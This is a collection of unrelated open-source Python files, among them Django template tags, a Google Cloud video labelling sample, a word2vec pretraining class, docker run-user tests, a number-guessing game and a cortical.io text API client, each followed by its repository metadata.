raise TemplateSyntaxError("'templatetag' statement takes one argument")
tag = bits[1]
if tag not in TemplateTagNode.mapping:
raise TemplateSyntaxError("Invalid templatetag argument: '%s'."
" Must be one of: %s" %
(tag, list(TemplateTagNode.mapping)))
return TemplateTagNode(tag)
@register.tag
def url(parser, token):
"""
Returns an absolute URL matching given view with its parameters.
This is a way to define links that aren't tied to a particular URL
configuration::
{% url "path.to.some_view" arg1 arg2 %}
or
{% url "path.to.some_view" name1=value1 name2=value2 %}
The first argument is a path to a view. It can be an absolute Python path
or just ``app_name.view_name`` without the project name if the view is
located inside the project.
Other arguments are space-separated values that will be filled in place of
positional and keyword arguments in the URL. Don't mix positional and
keyword arguments.
All arguments for the URL should be present.
For example if you have a view ``app_name.client`` taking client's id and
the corresponding line in a URLconf looks like this::
('^client/(\d+)/$', 'app_name.client')
and this app's URLconf is included into the project's URLconf under some
path::
('^clients/', include('project_name.app_name.urls'))
then in a template you can create a link for a certain client like this::
{% url "app_name.client" client.id %}
The URL will look like ``/clients/client/123/``.
The first argument can also be a named URL instead of the Python path to
the view callable. For example if the URLconf entry looks like this::
url('^client/(\d+)/$', name='client-detail-view')
then in the template you can use::
{% url "client-detail-view" client.id %}
There is even another possible value type for the first argument. It can be
the name of a template variable that will be evaluated to obtain the view
name or the URL name, e.g.::
{% with view_path="app_name.client" %}
{% url view_path client.id %}
{% endwith %}
or,
{% with url_name="client-detail-view" %}
{% url url_name client.id %}
{% endwith %}
"""
bits = token.split_contents()
if len(bits) < 2:
raise TemplateSyntaxError("'%s' takes at least one argument"
" (path to a view)" % bits[0])
try:
viewname = parser.compile_filter(bits[1])
except TemplateSyntaxError as exc:
exc.args = (exc.args[0] + ". "
"The syntax of 'url' changed in Django 1.5, see the docs."),
raise
args = []
kwargs = {}
asvar = None
bits = bits[2:]
if len(bits) >= 2 and bits[-2] == 'as':
asvar = bits[-1]
bits = bits[:-2]
if len(bits):
for bit in bits:
match = kwarg_re.match(bit)
if not match:
raise TemplateSyntaxError("Malformed arguments to url tag")
name, value = match.groups()
if name:
kwargs[name] = parser.compile_filter(value)
else:
args.append(parser.compile_filter(value))
return URLNode(viewname, args, kwargs, asvar)
@register.tag
def verbatim(parser, token):
"""
Stops the template engine from rendering the contents of this block tag.
Usage::
{% verbatim %}
{% don't process this %}
{% endverbatim %}
You can also designate a specific closing tag block (allowing the
unrendered use of ``{% endverbatim %}``)::
{% verbatim myblock %}
...
{% endverbatim myblock %}
"""
nodelist = parser.parse(('endverbatim',))
parser.delete_first_token()
return VerbatimNode(nodelist.render(Context()))
@register.tag
def widthratio(parser, token):
"""
For creating bar charts and such, this tag calculates the ratio of a given
value to a maximum value, and then applies that ratio to a constant.
For example::
<img src='bar.gif' height='10' width='{% widthratio this_value max_value max_width %}' />
If ``this_value`` is 175, ``max_value`` is 200, and ``max_width`` is 100,
the image in the above example will be 88 pixels wide
(because 175/200 = .875; .875 * 100 = 87.5 which is rounded up to 88).
"""
bits = token.split_contents()
if len(bits) != 4:
raise TemplateSyntaxError("widthratio takes three arguments")
tag, this_value_expr, max_value_expr, max_width = bits
return WidthRatioNode(parser.compile_filter(this_value_expr),
parser.compile_filter(max_value_expr),
parser.compile_filter(max_width))
@register.tag('with')
def do_with(parser, token):
"""
Adds one or more values to the context (inside of this block) for caching
and easy access.
For example::
{% with total=person.some_sql_method %}
{{ total }} object{{ total|pluralize }}
{% endwith %}
Multiple values can be added to the context::
{% with foo=1 bar=2 %}
...
{% endwith %}
The legacy format of ``{% with person.some_sql_method as total %}`` is
still accepted.
"""
bits = token.split_contents()
remaining_bits = bits[1:]
extra_context = token_kwargs(remaining_bits, parser, support_legacy=True)
if not extra_context:
raise TemplateSyntaxError("%r expected at least one variable "
"assignment" % bits[0])
if remaining_bits:
raise TemplateSyntaxError("%r received an invalid token: %r" %
(bits[0], remaining_bits[0]))
nodelist = parser.parse(('endwith',))
parser.delete_first_token()
return WithNode(None, None, nodelist, extra_context=extra_context)
| jgeskens/django | django/template/defaulttags.py | Python | bsd-3-clause | 50,082 |
#!/usr/bin/env python
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This application demonstrates how to detect labels from a video
based on the image content with the Google Cloud Video Intelligence
API.
For more information, check out the documentation at
https://cloud.google.com/videointelligence/docs.
Usage Example:
python labels.py gs://cloud-ml-sandbox/video/chicago.mp4
"""
# [START video_label_tutorial]
# [START video_label_tutorial_imports]
import argparse
from google.cloud import videointelligence
# [END video_label_tutorial_imports]
def analyze_labels(path):
""" Detects labels given a GCS path. """
# [START video_label_tutorial_construct_request]
video_client = videointelligence.VideoIntelligenceServiceClient()
features = [videointelligence.Feature.LABEL_DETECTION]
operation = video_client.annotate_video(
request={"features": features, "input_uri": path}
)
# [END video_label_tutorial_construct_request]
print("\nProcessing video for label annotations:")
# [START video_label_tutorial_check_operation]
result = operation.result(timeout=90)
print("\nFinished processing.")
# [END video_label_tutorial_check_operation]
# [START video_label_tutorial_parse_response]
segment_labels = result.annotation_results[0].segment_label_annotations
for i, segment_label in enumerate(segment_labels):
print("Video label description: {}".format(segment_label.entity.description))
for category_entity in segment_label.category_entities:
print(
"\tLabel category description: {}".format(category_entity.description)
)
for i, segment in enumerate(segment_label.segments):
start_time = (
segment.segment.start_time_offset.seconds
+ segment.segment.start_time_offset.microseconds / 1e6
)
end_time = (
segment.segment.end_time_offset.seconds
+ segment.segment.end_time_offset.microseconds / 1e6
)
positions = "{}s to {}s".format(start_time, end_time)
confidence = segment.confidence
print("\tSegment {}: {}".format(i, positions))
print("\tConfidence: {}".format(confidence))
print("\n")
# [END video_label_tutorial_parse_response]
if __name__ == "__main__":
# [START video_label_tutorial_run_application]
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("path", help="GCS file path for label detection.")
args = parser.parse_args()
analyze_labels(args.path)
# [END video_label_tutorial_run_application]
# [END video_label_tutorial]
| googleapis/python-videointelligence | samples/labels/labels.py | Python | apache-2.0 | 3,327 |
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
from pymongo import MongoClient
class MongoPipeline(object):
client = MongoClient('localhost', 27017)
db = client.cigrasp
def process_item(self, item, spider):
self.db.output.insert(dict(item))
return item
| digitalmethodsinitiative/emaps | code_project_7,8,9/undp/pipelines.py | Python | apache-2.0 | 403 |
import ctypes
class MPQFileData(ctypes.Structure):
_fields_ = [
('filename', ctypes.c_char * 1024),
('plainpath', ctypes.c_char_p),
('hashindex', ctypes.c_int, 32),
('blockindex', ctypes.c_int, 32),
('filesize', ctypes.c_int, 32),
('fileflags', ctypes.c_int, 32),
('compsize', ctypes.c_int, 32),
('filetimelo', ctypes.c_int, 32),
('filetimehi', ctypes.c_int, 32),
('locale', ctypes.c_int, 32)
]
| srounet/pystormlib | pystormlib/structure.py | Python | mit | 485 |
#!/usr/bin/env python
import sys
import os
import tempfile
import glob
import filecmp
import time
from argparse import ArgumentParser
usage = "usage: %prog [options] program_to_test"
parser = ArgumentParser(description="""Testrunner for programming puzzles, runs a program against each
.in-file and checks the output against the corresponding .out-file using unix diff""")
parser.add_argument("-v", "--verbose", action="store_true", help="Be verbose", required=False, default=False)
parser.add_argument("-e", "--executor", dest="executor", default="", help="Execute the program with this executor (ex: java or python)")
parser.add_argument("-d", "--directory", dest="directory", default="", help="""The directory where test files with extensions .in
and .ans can be found (default is a a folder named test placed as
a subfolder to the folder where the program is located)""")
parser.add_argument("program")
args = parser.parse_args()
program = args.program
if program[0] != '.':
program = "./" + program
f = open(program)
program_path = os.path.dirname(program)
if args.directory:
test_search_path = "%s/*.in" % args.directory
else:
test_search_path = "%s/test/*.in" % program_path
success = True
tests_found = False
try:
for test_file in glob.glob(test_search_path):
tests_found = True
start = time.time()
os.system(args.executor + " " + program + "<" + test_file + " > answer.tmp")
end = time.time()
test_exp_file = test_file.replace(".in", ".ans")
if not filecmp.cmp(test_exp_file, "answer.tmp"):
success = False
print(test_file + ", FAILED")
elif args.verbose:
print(test_file + ", succes")
if args.verbose:
print(test_file + ", execution time = " + str(end - start))
finally:
if os.path.isfile("answer.tmp"):
os.remove("answer.tmp")
if not tests_found:
print("No test files found")
elif success:
print("Success")
else:
print("Failed (%s)" % program)
| plilja/algolib | util/checksol.py | Python | apache-2.0 | 2,044 |
class Redraw:
""" Invalidate bitmasks. """
Nothing = 0
Cursor = 1
Borders = 2
Panes = 4
StatusBar = 16
ClearFirst = 32
All = Cursor | Borders | Panes | StatusBar | ClearFirst
| jonathanslenders/python-vterm | libpymux/invalidate.py | Python | bsd-2-clause | 210 |
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2015 ADHOC SA (http://www.adhoc.com.ar)
# All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Product Stock Location',
'version': '1.0',
'category': 'Sales Management',
'sequence': 14,
'summary': 'Sales, Product, Category, Clasification',
'description': """
Product Stock Location
======================
""",
'author': 'ADHOC SA',
'website': 'www.adhoc.com.ar',
'images': [
],
'depends': [
'stock',
],
'data': [
'product_view.xml',
],
'demo': [
],
'test': [
],
'installable': True,
'auto_install': False,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| maljac/odoo-addons | product_stock_location/__openerp__.py | Python | agpl-3.0 | 1,577 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0008_auto_20150907_0317'),
]
operations = [
migrations.RenameField(
model_name='experiment',
old_name='source_code_repository',
new_name='repository',
),
]
| niekas/dakis | dakis/core/migrations/0009_auto_20150907_0553.py | Python | agpl-3.0 | 408 |
#!usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
from collections import Counter
from operator import itemgetter
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
from gensim.models import Word2Vec
from sklearn.cluster import AgglomerativeClustering
from sklearn.manifold import TSNE
class SentenceIterator:
def __init__(self, tokens, sentence_len=100):
self.sentence_len = sentence_len
self.tokens = [t.lower() for t in tokens]
self.idxs = []
start_idx, end_idx = 0, self.sentence_len
while end_idx < len(self.tokens):
self.idxs.append((start_idx, end_idx))
start_idx += self.sentence_len
end_idx += self.sentence_len
def __iter__(self):
for start_idx, end_idx in self.idxs:
yield self.tokens[start_idx : end_idx]
class Pretrainer:
def __init__(self, nb_left_tokens, nb_right_tokens,
sentence_len=100, window=5,
minimum_count=2, size=300, nb_mfi=500,
nb_workers=10, nb_negative=5,
):
self.nb_left_tokens = nb_left_tokens
self.nb_right_tokens = nb_right_tokens
self.size = size
self.nb_mfi = nb_mfi
self.window = window
self.minimum_count = minimum_count
self.nb_workers = nb_workers
self.nb_negative = nb_negative
def fit(self, tokens):
# get most frequent items for plotting:
tokens = [t.lower() for t in tokens]
self.mfi = [t for t,_ in Counter(tokens).most_common(self.nb_mfi)]
self.sentence_iterator = SentenceIterator(tokens=tokens)
# train embeddings:
self.w2v_model = Word2Vec(self.sentence_iterator,
window=self.window,
min_count=self.minimum_count,
size=self.size,
workers=self.nb_workers,
negative=self.nb_negative)
self.plot_mfi()
self.most_similar()
# build an index of the train tokens
# which occur at least min_count times:
self.token_idx = {'<UNK>': 0}
for k, v in Counter(tokens).items():
if v >= self.minimum_count:
self.token_idx[k] = len(self.token_idx)
# create an ordered vocab:
self.train_token_vocab = [k for k, v in sorted(self.token_idx.items(),\
key=itemgetter(1))]
self.pretrained_embeddings = self.get_weights(self.train_token_vocab)
return self
def get_weights(self, vocab):
unk = np.zeros(self.size)
weights = []
for w in vocab:
try:
weights.append(self.w2v_model[w])
except KeyError:
weights.append(unk)
return [np.asarray(weights, dtype='float32')]
def transform(self, tokens):
context_ints = []
tokens = [t.lower() for t in tokens]
for curr_idx, token in enumerate(tokens):
ints = []
# vectorize left context:
left_context_tokens = [tokens[curr_idx-(t+1)]\
for t in range(self.nb_left_tokens)\
if curr_idx-(t+1) >= 0][::-1]
idxs = []
if left_context_tokens:
idxs = [self.token_idx[t] if t in self.token_idx else 0 \
for t in left_context_tokens]
while len(idxs) < self.nb_left_tokens:
idxs = [0] + idxs
ints.extend(idxs)
# vectorize right context
right_context_tokens = [tokens[curr_idx+(t+1)]\
for t in range(self.nb_right_tokens)\
if curr_idx+(t+1) < len(tokens)]
idxs = []
if right_context_tokens:
idxs = [self.token_idx[t] if t in self.token_idx else 0 \
for t in right_context_tokens]
while len(idxs) < self.nb_right_tokens:
idxs.append(0)
ints.extend(idxs)
context_ints.append(ints)
return np.asarray(context_ints, dtype='int32')
def plot_mfi(self, outputfile='embeddings.pdf', nb_clusters=8, weights='NA'):
# collect embeddings for mfi:
X = np.asarray([self.w2v_model[w] for w in self.mfi \
if w in self.w2v_model], dtype='float32')
# dimension reduction:
tsne = TSNE(n_components=2)
coor = tsne.fit_transform(X) # unsparsify
plt.clf()
sns.set_style('dark')
sns.plt.rcParams['axes.linewidth'] = 0.4
fig, ax1 = sns.plt.subplots()
labels = self.mfi
# first plot slices:
x1, x2 = coor[:,0], coor[:,1]
ax1.scatter(x1, x2, 100, edgecolors='none', facecolors='none')
# clustering on top (add some colouring):
clustering = AgglomerativeClustering(linkage='ward',
affinity='euclidean', n_clusters=nb_clusters)
clustering.fit(coor)
# add names:
for x, y, name, cluster_label in zip(x1, x2, labels, clustering.labels_):
ax1.text(x, y, name, ha='center', va="center",
color=plt.cm.spectral(cluster_label / 10.),
fontdict={'family': 'Arial', 'size': 8})
# control aesthetics:
ax1.set_xlabel('')
ax1.set_ylabel('')
ax1.set_xticklabels([])
ax1.set_xticks([])
ax1.set_yticklabels([])
ax1.set_yticks([])
sns.plt.savefig(outputfile, bbox_inches=0)
def most_similar(self, nb_neighbors=5,
words=['doet', 'goet', 'ende', 'mach', 'gode'],
outputfile='neighbours.txt'):
with open(outputfile, 'w') as f:
for w in words:
try:
neighbors = ' - '.join([v for v,_ in self.w2v_model.most_similar(w)])
f.write(' '.join((w, '>', neighbors))+'\n')
f.write(':::::::::::::::::\n')
except KeyError:
pass
| mikekestemont/pandora | pandora/pretraining.py | Python | mit | 6,321 |
import unittest
import utils
from tree import TreeNode
# O(n) time. O(log(n)) space. Recursive post-order DFS.
class Solution:
def pruneTree(self, root):
"""
:type root: TreeNode
:rtype: TreeNode
"""
def prune(node):
if not node:
return True
left_pruned = prune(node.left)
if left_pruned:
node.left = None
right_pruned = prune(node.right)
if right_pruned:
node.right = None
return left_pruned and right_pruned and node.val == 0
return None if prune(root) else root
class Test(unittest.TestCase):
def test(self):
cases = utils.load_test_json(__file__).test_cases
for case in cases:
args = str(case.args)
root = TreeNode.from_array(case.args.root)
actual = Solution().pruneTree(root)
actual = TreeNode.to_array_static(actual)
self.assertEqual(case.expected, actual, msg=args)
if __name__ == '__main__':
unittest.main()
| chrisxue815/leetcode_python | problems/test_0814.py | Python | unlicense | 1,085 |
r"""
Summary
----------
This test checks correctness of docker run -u ...
Operational Summary
--------------------
1. get container's /etc/passwd
2. generate uid which suits the test needs (nonexisting, existing name, uid..)
3. execute docker run -u ... echo $UID:$GID; whoami
4. check results (pass/fail/details)
"""
from autotest.client import utils
from dockertest import config, xceptions, subtest
from dockertest.containers import DockerContainers
from dockertest.dockercmd import DockerCmd
from dockertest.images import DockerImage
from dockertest.output import OutputGood
class run_user(subtest.SubSubtestCaller):
""" Subtest caller """
def _get_passwd_from_container(self):
"""
Get /etc/passwd from container (it's used to generate correct uids)
"""
name = self.stuff['dc'].get_unique_name("initialization", length=4)
self.stuff['container'] = name
subargs = ['--rm', '--interactive']
subargs.append("--name %s" % name)
fin = DockerImage.full_name_from_defaults(self.config)
subargs.append(fin)
subargs.append("cat /etc/passwd")
cmd = DockerCmd(self, 'run', subargs, verbose=False)
result = cmd.execute()
self.failif(result.exit_status != 0,
"Failed to get container's /etc/passwd. Exit status is !0"
"\n%s" % result)
OutputGood(result)
return result.stdout
def initialize(self):
super(run_user, self).initialize()
self.stuff['dc'] = DockerContainers(self)
self.stuff['passwd'] = self._get_passwd_from_container()
def cleanup(self):
"""
Cleanup the container
"""
super(run_user, self).cleanup()
if self.config['remove_after_test']:
dc = DockerContainers(self)
dc.clean_all([self.stuff.get("container")])
class run_user_base(subtest.SubSubtest):
""" Base class """
def _init_container(self, subargs, cmd):
"""
Starts container
"""
name = self.sub_stuff['dc'].get_unique_name()
self.sub_stuff['container'] = name
subargs.append("--name %s" % name)
fin = DockerImage.full_name_from_defaults(self.config)
subargs.append(fin)
subargs.append("bash")
subargs.append("-c")
subargs.append(cmd)
self.sub_stuff['cmd'] = DockerCmd(self, 'run', subargs, verbose=False)
def _init_test_depenent(self):
"""
Override this with your desired test setup.
"""
self.sub_stuff['execution_failure'] = None
self.sub_stuff['uid_check'] = None
self.sub_stuff['whoami_check'] = None
self.sub_stuff['subargs'] = None
raise NotImplementedError("Override this methodin your test!")
def initialize(self):
"""
Runs one container
"""
super(run_user_base, self).initialize()
# Prepare a container
config.none_if_empty(self.config)
self.sub_stuff['dc'] = DockerContainers(self)
self._init_test_depenent()
self._init_container(self.sub_stuff['subargs'],
self.config['exec_cmd'])
def run_once(self):
"""
Execute docker and store the results
"""
super(run_user_base, self).run_once()
self.sub_stuff['result'] = self.sub_stuff['cmd'].execute()
def postprocess(self):
super(run_user_base, self).postprocess()
# Exit status
if self.sub_stuff['execution_failure']:
self._postprocess_bad()
else:
self._postprocess_good()
def _postprocess_bad(self):
"""
Check that container execution failed with correct message
"""
result = self.sub_stuff['result']
self.failif(result.exit_status == 0, "Container's exit status is "
"0, although it should failed:\n0%s"
% result)
output = (str(result.stdout) + str(result.stderr))
self.failif((self.sub_stuff['execution_failure']
not in output),
"Expected failure message '%s' is not in the "
"container's output:\n%s"
% (self.sub_stuff['execution_failure'], output))
def _postprocess_good(self):
"""
Check that container executed correctly and that output is as expected
"""
result = self.sub_stuff['result']
OutputGood(result)
self.failif(result.exit_status != 0,
"Container's exit status is !0 although it should pass"
":\n%s" % result)
output = (str(result.stdout) + str(result.stderr))
self.failif(self.sub_stuff['uid_check'] not in output, "UID "
"check line '%s' not present in the container output:\n%s"
% (self.sub_stuff['uid_check'], result))
self.failif(self.sub_stuff['whoami_check'] not in output,
"whoami check line '%s' not present in the container "
"output:\n%s" % (self.sub_stuff['whoami_check'], result))
def cleanup(self):
"""
Cleanup the container
"""
super(run_user_base, self).cleanup()
if self.config['remove_after_test']:
dc = DockerContainers(self)
dc.clean_all([self.sub_stuff.get("container")])
class default(run_user_base):
"""
Doesn't use "-u" and expects the default user to be root::0
"""
def _init_test_depenent(self):
self.sub_stuff['execution_failure'] = False
self.sub_stuff['uid_check'] = "UIDCHECK: 0:"
self.sub_stuff['whoami_check'] = "WHOAMICHECK: root"
self.sub_stuff['subargs'] = ['--rm', '--interactive']
class named_user(run_user_base):
"""
Finds any user but root existing on container and uses it by name
"""
def _init_test_depenent(self):
user = None
for line in self.parent_subtest.stuff['passwd'].splitlines():
line = line.strip()
if not line or line.startswith('root') or line.startswith('#'):
continue
user, _, uid, _ = line.split(':', 3)
break
if not user:
msg = ("This container's image doesn't contain passwd with "
"multiple users, unable to execute this test\n%s"
% self.parent_subtest.stuff['passwd'])
raise xceptions.DockerTestNAError(msg)
self.sub_stuff['execution_failure'] = False
self.sub_stuff['uid_check'] = "UIDCHECK: %s:" % uid
self.sub_stuff['whoami_check'] = "WHOAMICHECK: %s" % user
self.sub_stuff['subargs'] = ['--rm', '--interactive',
'--user=%s' % user]
class num_user(run_user_base):
"""
Finds any user but root existing on container and uses it by uid
"""
def _init_test_depenent(self):
user = None
for line in self.parent_subtest.stuff['passwd'].splitlines():
line = line.strip()
if not line or line.startswith('root') or line.startswith('#'):
continue
user, _, uid, _ = line.split(':', 3)
break
if not user:
msg = ("This container's image doesn't contain passwd with "
"multiple users, unable to execute this test\n%s"
% self.parent_subtest.stuff['passwd'])
raise xceptions.DockerTestNAError(msg)
self.sub_stuff['execution_failure'] = False
self.sub_stuff['uid_check'] = "UIDCHECK: %s:" % uid
self.sub_stuff['whoami_check'] = "WHOAMICHECK: %s" % user
self.sub_stuff['subargs'] = ['--rm', '--interactive',
'--user=%s' % uid]
class bad_user(run_user_base):
"""
Generates user name which doesn't exist in containers passwd
"""
def _init_test_depenent(self):
users = []
for line in self.parent_subtest.stuff['passwd'].splitlines():
line = line.strip()
try:
users.append(line.split(':', 1)[0])
except IndexError:
pass
user = utils.get_unique_name(lambda name: name not in users, "user",
length=6)
self.sub_stuff['execution_failure'] = "Unable to find user %s" % user
self.sub_stuff['subargs'] = ['--rm', '--interactive',
'--user=%s' % user]
class bad_number(run_user_base):
"""
Generates user id which doesn't exist in containers passwd
(it should start, print correct uid, but whoami should fail)
"""
def _init_test_depenent(self):
uid = False
uids = []
for line in self.parent_subtest.stuff['passwd'].splitlines():
line = line.strip()
try:
uids.append(int(line.split(':', 3)[2]))
except (IndexError, TypeError):
pass
for i in xrange(1, 2147483647):
if i not in uids:
uid = i
break
if uid is False:
msg = ("This container's image passwd occupies all uids. Unable to"
" execute this test\n%s"
% self.parent_subtest.stuff['passwd'])
raise xceptions.DockerTestNAError(msg)
self.sub_stuff['execution_failure'] = False
self.sub_stuff['uid_check'] = "UIDCHECK: %s:" % uid
self.sub_stuff['whoami_check'] = ("whoami: cannot find name for user "
"ID %s" % uid)
self.sub_stuff['subargs'] = ['--rm', '--interactive',
'--user=%s' % uid]
class too_high_number(run_user_base):
"""
Uses incorrectly large uid number (2147483648)
"""
def _init_test_depenent(self):
self.sub_stuff['execution_failure'] = ("Uids and gids must be in "
"range 0-2147483647")
self.sub_stuff['subargs'] = ['--rm', '--interactive',
'--user=2147483648']
| luwensu/autotest-docker | subtests/docker_cli/run_user/run_user.py | Python | gpl-2.0 | 10,198 |
# coding=utf-8
# 方便出中文版,采用utf-8字符
import random
secret = random.randint(1,100)
guess = int(0)
tries = int(0)
#加载随机数模块,生成了一个1-99的随机整数为答案。并将"猜的数字(guess)"和"次数(tries)"初始化。
print("我是个可怕的海盗,罗伯特。我有个秘密!")
print("猜一个1-99的整数,你有6的机会。")
#开场语,"我是可怕的海盗罗伯特,我有个秘密!"
#开场语,"猜一个1-99的整数,你有6次机会。"
while int(guess) != secret and tries < 6:
guess = input("选一个吧:")
#游戏开始条件判定,当猜的数字不等于答案,且猜的次数有效。
if int(guess) == 724:
print(secret)
#为"BF"预留的后门,直接查看随机整数。默认值为724。
elif int(guess) < 0 or int(guess) > 99:
print("超出范围啦!")
#检测用户输入数值是否符合范围。
elif int(guess) < secret and -1 < int(guess) < 100:
print("太低了!")
#用户输入数值低于随机整数。
elif int(guess) > secret and -1 < int(guess) < 100:
print("高了!高了!")
#用户输入数值高于随机整数。
tries = tries + 1
#每结束一个回合,次数+1。
if int(guess) == secret:
print("漂亮!你明白了吗?!我找到了我的秘密!")
#用户猜对了,输出提示。
elif tries == 6:
print("别再猜测了!下次好运,伙计!")
print("秘密号码是:", secret)
#用户机会用完了,输出答案。
| duaiyumi/python-test | NumGuessGame_vip.py | Python | gpl-3.0 | 1,598 |
import torch
from .Module import Module
class SoftShrink(Module):
def __init__(self, lambd=0.5):
super(SoftShrink, self).__init__()
self.lambd = lambd
def updateOutput(self, input):
self._backend.SoftShrink_updateOutput(
self._backend.library_state,
input,
self.output,
self.lambd
)
return self.output
def updateGradInput(self, input, gradOutput):
self._backend.SoftShrink_updateGradInput(
self._backend.library_state,
input,
gradOutput,
self.gradInput,
self.lambd
)
return self.gradInput
| RPGOne/Skynet | pytorch-master/torch/legacy/nn/SoftShrink.py | Python | bsd-3-clause | 678 |
#!python.exe
import find_distances
stations_in = [find_distances.Station("Raynes Park, UK", "RAY")]
stations_out = find_distances.get_stations_close_to(stations_in, "driving", "Wimbledon, UK", 7000)
for s in stations_out:
print s
stations_out = find_distances.get_stations_close_to(stations_in, "transit", "Wimbledon, UK", 7000)
for s in stations_out:
print s
| PeterSchuebel/home-finder | test_find_distances.py | Python | gpl-2.0 | 385 |
from asposewords import Settings
from com.aspose.words import Document
from com.aspose.words import NodeType
from com.aspose.words import AutoFitBehavior
class AutoFitTables:
def __init__(self):
self.dataDir = Settings.dataDir + 'programming_documents/'
doc = Document(self.dataDir + "TestFile.doc")
self.autofit_table_to_contents(doc)
self.autofit_table_to_fixed_width_columns(doc)
self.autofit_table_to_window(doc)
def autofit_table_to_contents(self, doc):
table = doc.getChild(NodeType.TABLE, 0, True)
# Auto fit the table to the cell contents
table.autoFit(AutoFitBehavior.AUTO_FIT_TO_CONTENTS)
# Save the document to disk.
doc.save(self.dataDir + "AutoFitToContents.doc")
print "Table auto fit to contents successfully."
def autofit_table_to_fixed_width_columns(self, doc):
table = doc.getChild(NodeType.TABLE, 0, True)
# Disable autofitting on this table.
table.autoFit(AutoFitBehavior.FIXED_COLUMN_WIDTHS)
# Save the document to disk.
doc.save(self.dataDir + "AutoFitToFixedWidth.doc")
print "Table auto fit to fixed width columns successfully."
def autofit_table_to_window(self, doc):
table = doc.getChild(NodeType.TABLE, 0, True)
# Autofit the first table to the page width.
table.autoFit(AutoFitBehavior.AUTO_FIT_TO_WINDOW)
# Save the document to disk.
doc.save(self.dataDir + "AutoFitToWindow.doc")
print "Table auto fit to windows successfully."
if __name__ == '__main__':
AutoFitTables() | aspose-words/Aspose.Words-for-Java | Plugins/Aspose_Words_Java_for_Jython/asposewords/programming_documents/AutoFitTables.py | Python | mit | 1,685 |
#!/usr/bin/env python
"""
/*******************************************************************************
* Copyright (c) cortical.io GmbH. All rights reserved.
*
* This software is confidential and proprietary information.
* You shall use it only in accordance with the terms of the
* license agreement you entered into with cortical.io GmbH.
******************************************************************************/
"""
from cortical.models import fingerprint
from cortical.models import languageRest
from cortical.models import text
class TextApi(object):
def __init__(self, apiClient):
self.apiClient = apiClient
def getRepresentationForText(self, retina_name, body, ):
"""Get a retina representation of a text
Args:
body, str: The text to be evaluated (required)
retina_name, str: The retina name (required)
Returns: Array[Fingerprint]
"""
resourcePath = '/text'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return [fingerprint.Fingerprint(**r) for r in response.json()]
def getKeywordsForText(self, retina_name, body, ):
"""Get a list of keywords from the text
Args:
body, str: The text to be evaluated (required)
retina_name, str: The retina name (required)
Returns: Array[str]
"""
resourcePath = '/text/keywords'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return response.json()
def getTokensForText(self, retina_name, body, POStags=None, ):
"""Get tokenized input text
Args:
body, str: The text to be tokenized (required)
POStags, str: Specify desired POS types (optional)
retina_name, str: The retina name (required)
Returns: Array[str]
"""
resourcePath = '/text/tokenize'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
queryParams['POStags'] = POStags
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return response.json()
def getSlicesForText(self, retina_name, body, get_fingerprint=None, start_index=0, max_results=10):
"""Get a list of slices of the text
Args:
body, str: The text to be evaluated (required)
get_fingerprint, bool: Configure if the fingerprint should be returned as part of the results (optional)
retina_name, str: The retina name (required)
start_index, int: The start-index for pagination (optional) (optional)
max_results, int: Max results per page (optional) (optional)
Returns: Array[Text]
"""
resourcePath = '/text/slices'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
queryParams['start_index'] = start_index
queryParams['max_results'] = max_results
queryParams['get_fingerprint'] = get_fingerprint
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return [text.Text(**r) for r in response.json()]
def getRepresentationsForBulkText(self, retina_name, body, sparsity=1.0):
"""Bulk get Fingerprint for text.
Args:
body, ExpressionOperation: The JSON encoded expression to be evaluated (required)
retina_name, str: The retina name (required)
sparsity, float: Sparsify the resulting expression to this percentage (optional)
Returns: Array[Fingerprint]
"""
resourcePath = '/text/bulk'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
queryParams['sparsity'] = sparsity
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return [fingerprint.Fingerprint(**r) for r in response.json()]
def getLanguage(self, body, ):
"""Detect the language of a text
Args:
body, str: Your input text (UTF-8) (required)
Returns: LanguageRest
"""
resourcePath = '/text/detect_language'
method = 'POST'
queryParams = {}
